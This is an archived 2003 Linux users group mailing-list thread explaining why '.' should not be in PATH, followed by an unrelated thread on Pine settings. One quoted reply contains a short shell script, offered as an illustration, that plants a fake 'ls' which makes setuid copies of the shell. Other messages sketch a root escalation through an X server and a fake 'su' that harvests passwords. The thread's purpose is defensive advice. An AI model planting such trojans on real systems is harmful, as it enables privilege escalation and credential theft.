[LUGSB] A Windows user's habit is not healthy in Linux

Adam David Alan Martin addmarti at ic.sunysb.edu
Tue Nov 25 16:21:40 EST 2003 

Some points on this... just my 0.02USD, I guess.....


On Tue, 25 Nov 2003, Charles P Wright wrote:

> > > Some people also put "." in their path, but I personally think thats a bad
> > > idea.
> >
> > Why exactly?
> Let's say I drop something like (but untested):
>
> #!/bin/sh
>
> cp /bin/sh /tmp/.root-shells/sh-$UID >/dev/null 2>&1
> chmod 4777 /tmp/.root-shells/sh-$UID >/dev/null 2>&1
>
> exec /bin/ls $*
>
> Into a file named /tmp/ls.  I could of course have it remove itself before
> execing the real ls, so that you don't see it.
>
> Now you cd /tmp, and type ls.  If "." is in your path before "/bin", then
> I get a shell that executes as your user.  I just run
> /tmp.root-shells/sh-$UID to pretend I'm that user.
>
> > I've been told that it makes for some sort of security issue, but I
> > don't understand what the problem would be, especially if you put it at
> > the end of your path.
> The end is certainly better than the beginning.
>
> Chip

While I'm certainly inclined to agree with Chip, that the end
is better than the beginning, for placing the "." on a path,
I would certainly NOT reccomend it.  If you believe, for example,
that your system has properly installed a package, with an
executable file named "foo", and it really doesn't the same thing
applies.  All placing it at the end does is guarantee that if it's
a "system" installed binary, it gets run, instead of the one local
to wherever you are.

In an earlier post on this thread someone said that it wasn't as
big a problem for non-root users...  I disagree:

It gets worse, too:  Some commands are SUID root because they have to
be... Things like su, and such.  Normally this isn't a problem, since
they ask you for your root password; however some do not.  Accelerrated
X11 servers are installed SUID root, such that they may access
/dev/mem, and /dev/ports.  Dependant upon how your system is setup,
and how X is written (Which X server... Xfree86, etc...), you can cause
severe security breeches, if X is configured to run other programmes.

I.E.: X will start, and try to fork and launch a windowmanager.
but another fork of X will do something, like start another acceleration
daemon.  If X doesn't shed the user's path, before trying to start that,
acceleration daemon; and there is a file with "x" permission
in the cwd of the X server, you're in trouble.  Using the simple
trick shown above by Chip, and substituting the name of the daemon
for "ls", someone can easily get a root shell on your system.

For this, and other reasons, I don't think typing:
./$EXECNAME
is too much trouble (Where $EXECNAME is the name of the executable you
wish to run, that is not in the path.)

While that example is a little bit far fetched, I know someone who
had his Solaris box rooted using a script called by his apache
server.  I don't know the particulars of how the cracker
convinced httpd to run his script; but I suspect it something to
do with the fact that the guy would run his CGI scripts
from their directories with "." in his path...  (Could be
coincidence...  but we'll never know... he wiped the whole system
to start again.)

Just because someone is not a ROOT user on your system doesn't
mean he or she may not be running possible programmes installed as root.

An afterthought, as well, on the password-asking ones, like su.  A
user might leave a malicious script in a directory he has access to,
called "su" which does pass the password on to the real su(1)
but also will harvest it, and keep it for himself; kicking around.

I guess security is not something to be taken lightly, IMHO.

--
Adam Martin
>From ezk at fsl.cs.sunysb.edu Tue Nov 25 16:32:24 2003
Received: from agora.fsl.cs.sunysb.edu
	(IDENT:G1mosxTD3kbvnwvpM8UpQKy5C3W/xXZE at agora.fsl.cs.sunysb.edu
	[130.245.126.12])hAPLWOHn029677
	for <lugsb at fsl.cs.sunysb.edu>; Tue, 25 Nov 2003 16:32:24 -0500
Received: from agora.fsl.cs.sunysb.edu
	(IDENT:e/qy40fLLQBd9K20UkzSCLMiQD85LILz at localhost.localdomain [127.0.0.1])
	hAPLWXg9018827
	for <lugsb at fsl.cs.sunysb.edu>; Tue, 25 Nov 2003 16:32:33 -0500
Received: (from ezk at localhost)
	by agora.fsl.cs.sunysb.edu (8.12.8/8.12.8/Submit) id hAPLWXwq018823;
	Tue, 25 Nov 2003 16:32:33 -0500
Date: Tue, 25 Nov 2003 16:32:33 -0500
Message-Id: <200311252132.hAPLWXwq018823 at agora.fsl.cs.sunysb.edu>
From: Erez Zadok <ezk at cs.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] A Windows user's habit is not healthy in Linux 
In-reply-to: Your message of "Tue, 25 Nov 2003 16:21:40 EST."
             <Pine.SOL.4.58.0311251557310.9187 at sparky.ic.sunysb.edu> 
X-MailKey: Erez_Zadok
X-BeenThere: lugsb at fsl.cs.sunysb.edu
X-Mailman-Version: 2.1.1
Precedence: list
Reply-To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
List-Id: Linux Users Group at Stony Brook <lugsb.fsl.cs.sunysb.edu>
List-Unsubscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=unsubscribe>
List-Archive: <http://lists.fsl.cs.sunysb.edu/pipermail/lugsb>
List-Post: <mailto:lugsb at fsl.cs.sunysb.edu>
List-Help: <mailto:lugsb-request at fsl.cs.sunysb.edu?subject=help>
List-Subscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=subscribe>
X-List-Received-Date: Tue, 25 Nov 2003 21:32:24 -0000

I never put "." in my path, not at the end either.  Why?  B/c of these
"programs": mroe, les, emcas, sl, lss, ls-l, cd-, and friends.

Erez.
>From dkhalily at ic.sunysb.edu Fri Nov 28 04:22:44 2003
Received: from mail.ic.sunysb.edu (mail.ic.sunysb.edu [129.49.1.4])
	hAS9MimU005980
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 04:22:44 -0500
Received: from postal.ic.sunysb.edu (mail [129.49.1.4])
	by mail.ic.sunysb.edu (8.12.10/8.12.10) with SMTP id hAS9Mjak015096
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 04:22:45 -0500 (EST)
Received: from smtp.ic.sunysb.edu ([129.49.1.24])
 by postal.ic.sunysb.edu (SAVSMTP 3.1.1.32) with SMTP id M2003112804224412731
 for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 04:22:44 -0500
Received: from sparky.ic.sunysb.edu (sparky.ic.sunysb.edu [129.49.1.3])
	by smtp.ic.sunysb.edu (8.12.10/8.12.10) with ESMTP id hAS9Mi0h015093
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 04:22:44 -0500 (EST)
Received: from localhost (dkhalily at localhost)
	by sparky.ic.sunysb.edu (8.12.10/8.12.9) with ESMTP id hAS9Mir5011687
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 04:22:44 -0500 (EST)
Date: Fri, 28 Nov 2003 04:22:44 -0500 (EST)
From: Bookface <dkhalily at ic.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] Pine question.
In-Reply-To: <Pine.GSO.4.44.0311251127230.19331-100000 at SunRa.mathlab.sunysb.edu>
Message-ID: <Pine.SOL.4.58.0311280417290.3112 at sparky.ic.sunysb.edu>
References: <Pine.GSO.4.44.0311251127230.19331-100000 at SunRa.mathlab.sunysb.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-BeenThere: lugsb at fsl.cs.sunysb.edu
X-Mailman-Version: 2.1.1
Precedence: list
Reply-To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
List-Id: Linux Users Group at Stony Brook <lugsb.fsl.cs.sunysb.edu>
List-Unsubscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=unsubscribe>
List-Archive: <http://lists.fsl.cs.sunysb.edu/pipermail/lugsb>
List-Post: <mailto:lugsb at fsl.cs.sunysb.edu>
List-Help: <mailto:lugsb-request at fsl.cs.sunysb.edu?subject=help>
List-Subscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=subscribe>
X-List-Received-Date: Fri, 28 Nov 2003 09:22:44 -0000


On Tue, 25 Nov 2003, Michael Graffam wrote:
> On Mon, 24 Nov 2003, Paul C Bors wrote:
>
> > How can you modify the from address in pine's configuration? I looked
> > for that option all over LoL
>
> It may require a re-compilation of Pine...


I don't know about all that. Here's how I did it in Pine on sparky: from
the main menu, go to [S]etup, [C]onfigure, and the first field is
"Personal-name" which you can set to whatever you like.

I assume that Pine would have the option to change this on by default,
because I doubt that sparky's administrators would take the trouble to
allow it if it wasn't.

I was under the impression that Pine wasn't "free as in free speech"
though and that's why Nano was created, because people weren't allowed
to use Pico seperately?


Also,
On Tue, 25 Nov 2003, Erez Zadok wrote:

> I never put "." in my path, not at the end either.  Why?  B/c of these
> "programs": mroe, les, emcas, sl, lss, ls-l, cd-, and friends.

But I never make mistakes... ;-)


- Daniel Khalily
>From mgraffam at mathlab.sunysb.edu Fri Nov 28 06:08:14 2003
Received: from SunRa.mathlab.sunysb.edu (SunRa.mathlab.sunysb.edu
	[129.49.17.48])hASB8EmU006772
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 06:08:14 -0500
Received: from SunRa.mathlab.sunysb.edu (localhost [127.0.0.1])
	hASB8FWO003897
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 06:08:15 -0500 (EST)
Received: from localhost (mgraffam at localhost)hASB8Fdn003894
	for <lugsb at fsl.cs.sunysb.edu>; Fri, 28 Nov 2003 06:08:15 -0500 (EST)
X-Authentication-Warning: SunRa.mathlab.sunysb.edu: mgraffam owned process
	doing -bs
Date: Fri, 28 Nov 2003 06:08:14 -0500 (EST)
From: Michael Graffam <mgraffam at mathlab.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] Pine question.
In-Reply-To: <Pine.SOL.4.58.0311280417290.3112 at sparky.ic.sunysb.edu>
Message-ID: <Pine.GSO.4.44.0311280604240.3751-100000 at SunRa.mathlab.sunysb.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-BeenThere: lugsb at fsl.cs.sunysb.edu
X-Mailman-Version: 2.1.1
Precedence: list
Reply-To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
List-Id: Linux Users Group at Stony Brook <lugsb.fsl.cs.sunysb.edu>
List-Unsubscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=unsubscribe>
List-Archive: <http://lists.fsl.cs.sunysb.edu/pipermail/lugsb>
List-Post: <mailto:lugsb at fsl.cs.sunysb.edu>
List-Help: <mailto:lugsb-request at fsl.cs.sunysb.edu?subject=help>
List-Subscribe: <http://www.fsl.cs.sunysb.edu/mailman/listinfo/lugsb>,
	<mailto:lugsb-request at fsl.cs.sunysb.edu?subject=subscribe>
X-List-Received-Date: Fri, 28 Nov 2003 11:08:14 -0000



On Fri, 28 Nov 2003, Bookface wrote:

> On Tue, 25 Nov 2003, Michael Graffam wrote:
> > It may require a re-compilation of Pine...
>
> I don't know about all that. Here's how I did it in Pine on sparky: from
> the main menu, go to [S]etup, [C]onfigure, and the first field is
> "Personal-name" which you can set to whatever you like.

Personal-name isn't the option in question.

> I assume that Pine would have the option to change this on by default,
> because I doubt that sparky's administrators would take the trouble to
> allow it if it wasn't.

You'd be surprised how easy it is to do ./configure --enable-changing-from
or whatever it is.

> I was under the impression that Pine wasn't "free as in free speech"
> though and that's why Nano was created, because people weren't allowed
> to use Pico seperately?

No. Pine isn't free as in freedom because of the distribution license.

More information about the lugsb mailing list